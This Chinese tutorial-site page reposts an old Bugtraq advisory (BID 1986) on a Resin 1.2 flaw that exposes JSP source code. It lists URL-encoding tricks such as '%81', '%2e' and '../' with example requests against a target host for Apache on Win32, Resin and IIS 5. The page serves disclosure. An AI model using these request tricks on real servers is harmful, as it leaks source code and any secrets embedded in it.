当前位置: 首页 > 图文教程 > 网络编程 > JSP > Resin 1.2 重要源代码暴露漏洞

JSP
小窗口大学问--玩转弹出窗口(3)
JDBC数据库访问例子(2)
用JSP操作Cookie(2)
JSP连接各类数据库大全(4)
JSP连接各类数据库大全(7)
WebLogic的初步研究(1-2)
JAVA/JSP学习系列之十
JAVA/JSP学习系列之九
JAVA/JSP学习系列之十二
JAVA/JSP学习系列之十四
WebLogic的初步研究(2-2)
WebLogic的初步研究(2-1)
JSP与Servlet之一
JAVA/JSP学习系列之十一
WebLogic的初步研究(1-1)
JSP与Servlet之二
JDBC数据库访问例子(1)
JSP技巧:发送动态图像(3)
JSP连接各类数据库大全(2)
JSP编程进度条设计实例(4)

JSP 中的 Resin 1.2 重要源代码暴露漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-02   浏览: 69 ::
收藏到网摘: n/a

bugtraq id 1986
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32

Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../


IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp